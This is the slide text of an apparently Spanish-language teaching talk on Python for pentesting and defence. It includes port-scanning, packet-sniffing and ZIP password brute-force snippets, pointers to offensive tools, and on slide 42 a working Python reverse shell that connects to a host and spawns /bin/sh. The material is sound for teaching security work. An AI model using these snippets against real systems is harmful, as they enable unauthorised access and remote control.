Slide 1

Slide 1 text

www.sti-innsbruck.at

Slide 2

Slide 2 text

About me 2 http://jmortega.github.io/

Slide 3

Slide 3 text

Books 3

Slide 4

Slide 4 text

Formación 4 https://www.adrformacion.com/cursos/pythonseg/pythonseg.html

Slide 5

Slide 5 text

Agenda • Introducción a Python para proyectos de ciberseguridad • Herramientas de pentesting • Herramientas Python desde el punto de vista defensivo • Herramientas Python desde el punto de vista ofensivo 5

Slide 6

Slide 6 text

Python para proyectos de ciberseguridad 6 1. Diseñado para la creación rápida de prototipos 2. Estructura simple y limpia, mejora la legibilidad y facilidad de uso. 3. Amplia biblioteca, también facilidad de interconexión 4. Ampliamente adoptado, la mayoría de las distribuciones de Linux lo instalan por defecto.

Slide 7

Slide 7 text

Python para proyectos de ciberseguridad 7

Slide 8

Slide 8 text

Herramientas de pentesting 8 import re input_ip = input('Enter the ip:') flag = 0 pattern = "^\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}$" match = re.match(pattern, input_ip) if (match): field = input_ip.split(".") for i in range(0, len(field)): if (int(field[i]) < 256): flag += 1 else: flag = 0 if (flag == 4): print("valid ip") else: print('No match for ip or not a valid ip') https://docs.python.org/3/library/re.html

Slide 9

Slide 9 text

Herramientas de pentesting 9

Slide 10

Slide 10 text

Herramientas de pentesting 10 import nmap nma = nmap.PortScannerAsync() def callback_function(host, scan_result): print('RESULTADO ==>') print(host, scan_result) nma.scan(hosts='127.0.0.1', arguments='-sC -Pn', callback=callback_function) while nma.still_scanning(): print("Esperando a que termine el escaneo ...") nma.wait(2) https://pypi.org/project/python-nmap/

Slide 11

Slide 11 text

Basic Networking 11

Slide 12

Slide 12 text

Port Scanning 12

Slide 13

Slide 13 text

Port Scanning 13 import socket from concurrent import futures def check_port(targetIp, portNumber, timeout): TCPsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) TCPsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) TCPsock.settimeout(timeout) try: TCPsock.connect((targetIp, portNumber)) return (portNumber) except: return def port_scanner(targetIp, timeout): threadPoolSize = 500 portsToCheck = 10000 executor = futures.ThreadPoolExecutor(max_workers=threadPoolSize) checks = [ executor.submit(check_port, targetIp, port, timeout) for port in range(0, portsToCheck, 1) ] for response in futures.as_completed(checks): if (response.result()): print('Listening on port: {}'.format(response.result()))

Slide 14

Slide 14 text

Port Scanning 14

Slide 15

Slide 15 text

Banner Grabing 15

Slide 16

Slide 16 text

Scraping 16 ● Requests ○ https://docs.python-requests.org/en/master ○ Peticiones HTTP ● BeautifulSoup ○ https://www.crummy.com/software/BeautifulSou p/bs4/doc ○ Parser XML,HTML ● Scrapy ○ https://scrapy.org ○ Framework de scraping

Slide 17

Slide 17 text

Scrapy 17

Slide 18

Slide 18 text

Extracción de subdominios 18 ● https://github.com/1N3/BlackWidow

Slide 19

Slide 19 text

Reconspider 19 ● https://github.com/bhavsec/reconspider

Slide 20

Slide 20 text

Reconspider 20

Slide 21

Slide 21 text

SpiderFoot 21

Slide 22

Slide 22 text

RED TEAM vs BLUE TEAM 22

Slide 23

Slide 23 text

SQLMap 23 ● https://sqlmap.org

Slide 24

Slide 24 text

SQLMap 24

Slide 25

Slide 25 text

PwnXSS 25

Slide 26

Slide 26 text

Fuzzing 26 ● Wfuzz ○ https://github.com/xmendez/wfuzz/ ○ Web fuzzer framework ● Pyfuzz ○ https://github.com/AyoobAli/pyfuzz ○ Fuzzing para descubrir archivos / directorios ocultos

Slide 27

Slide 27 text

Fuxi Scanner 27 ● https://github.com/jeffzh3ng/fuxi

Slide 28

Slide 28 text

Fuxi Scanner 28

Slide 29

Slide 29 text

Sniffing de paquetes 29 import socket import struct def ethernet_frame(data): dest_mac, src_mac, proto = struct.unpack('! 6s 6s H', data[:14]) return format_mac_addr(dest_mac), format_mac_addr(src_mac), socket.htons(proto), data[14:] def format_mac_addr(bytes_addr): bytes_str = map('{:02x}'.format, bytes_addr) return ':'.join(bytes_str).upper() def main(): conn = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(3)) while True: raw_data, addr = conn.recvfrom(65535) dest_mac, src_mac, eth_proto, data = ethernet_frame(raw_data) if eth_proto == 8: print('\nEthernet Frame:') print('Destination: {}, Source: {}, Protocol: {}'.format(dest_mac, src_mac, eth_proto)) print(data) if __name__ == "__main__": main()

Slide 30

Slide 30 text

Manipulación de paquetes 30 ● Scapy ○ https://scapy.net ○ Manipulación y decodificación de paquetes. ○ Enviar, rastrear, diseccionar y falsificar paquetes de red.

Slide 31

Slide 31 text

Manipulación de paquetes 31 from scapy.all import * packetCount = 0 def customAction(packet): global packetCount packetCount += 1 return "{}) {} → {}".format(packetCount, packet[0][1].src, packet[0][1].dst) ## Setup sniff, filtering for IP traffic sniff(filter="ip",prn=customAction)

Slide 32

Slide 32 text

Manipulación de paquetes 32 from scapy.all import ICMP from scapy.all import IP from scapy.all import sr1 from scapy.all import ls if __name__ == "__main__": dest_ip = "www.google.com" ip_layer = IP(dst = dest_ip) print(ls(ip_layer)) # displaying complete layer info # accessing the fields print("Destination = ", ip_layer.dst) print("Summary = ",ip_layer.summary())

Slide 33

Slide 33 text

Sniffing de paquetes 33 from scapy.all import * def main(): sniff(prn=http_header, filter="tcp port 80") def http_header(packet): http_packet=str(packet) if http_packet.find('GET'): return print_packet(packet) def print_packet(packet1): ret = "-------------------------------[ Received Packet ] -------------------------------\n" ret += "\n".join(packet1.sprintf("{Raw:%Raw.load%}\n").split(r"\r\n")) ret += "---------------------------------------------------------------------------------\n" return ret if __name__ == '__main__': main()

Slide 34

Slide 34 text

Explotación 34 ● CrackMapExec ○ https://github.com/byt3bl33d3r/CrackMapExec ○ Mapeo de la red, obtiene credenciales y ejecuta comandos. ● DeathStar ○ https://github.com/byt3bl33d3r/DeathStar ■ Permite automatizar la escalada de privilegios en un entorno Active Directory.

Slide 35

Slide 35 text

Password cracking 35 import zipfile import time encrypted_filename= "secret_file.zip" zFile = zipfile.ZipFile(encrypted_filename, "r") passFile = open("passwords.txt", "r") for line in passFile.readlines(): test_password = line.strip("\n").encode('utf-8') try: print(test_password) zFile.extractall(pwd=test_password) print("Match found") break except Exception as err: pass

Slide 36

Slide 36 text

SSH brute force 36 import paramiko ssh = paramiko.SSHClient() ssh.load_system_host_keys() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(‘127.0.0.1', username=‘user', password=‘password') stdin,stdout,stderr = ssh.exec_command("uname -a")

Slide 37

Slide 37 text

SSH brute force 37

Slide 38

Slide 38 text

Ejecución de procesos 38 https://docs.python.org/3/library/subprocess.html import subprocess subprocess.run('ls -la', shell=True) subprocess.run(['ls', '-la'])

Slide 39

Slide 39 text

Ejecución de procesos 39 https://docs.python.org/3/library/subprocess.html import subprocess process = subprocess.run(['which', 'python3'], capture_output=True) if process.returncode != 0: raise OSError('Sorry python3 is not installed') python_bin = process.stdout.strip() print(f'Python found in: {python_bin}') CompletedProcess(args=['which', 'python3'], returncode=0, stdout=b'/usr/bin/python3\n', stderr=b'')

Slide 40

Slide 40 text

Ejecución de procesos 40 https://docs.python.org/3/library/subprocess.html from pathlib import Path import subprocess source = Path("/home/linux") cmd = ["ls", "-l", source] proc = subprocess.Popen(cmd, stdout=subprocess.PIPE) stdout, stderr = proc.communicate() print(stdout.decode("utf-8").split('\n')[:-1])

Slide 41

Slide 41 text

Shell inversa 41

Slide 42

Slide 42 text

Shell inversa 42 #!/usr/bin/python import socket import subprocess import os sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect(("127.0.0.1", 45679)) os.dup2(sock.fileno(),0) os.dup2(sock.fileno(),1) os.dup2(sock.fileno(),2) shell_remote = subprocess.call(["/bin/sh", "-i"]) #proc = subprocess.call(["/bin/ls", "-i"])

Slide 43

Slide 43 text

Books 43

Slide 44

Slide 44 text

Books 44 https://github.com/PacktPublis hing/Python-Ethical-Hacking https://github.com/PacktPub lishing/Python-for-Offensive -PenTest

Slide 45

Slide 45 text

GitHub repository 45 https://github.com/jmortega/python_ciberseguridad_2021

Slide 46

Slide 46 text

46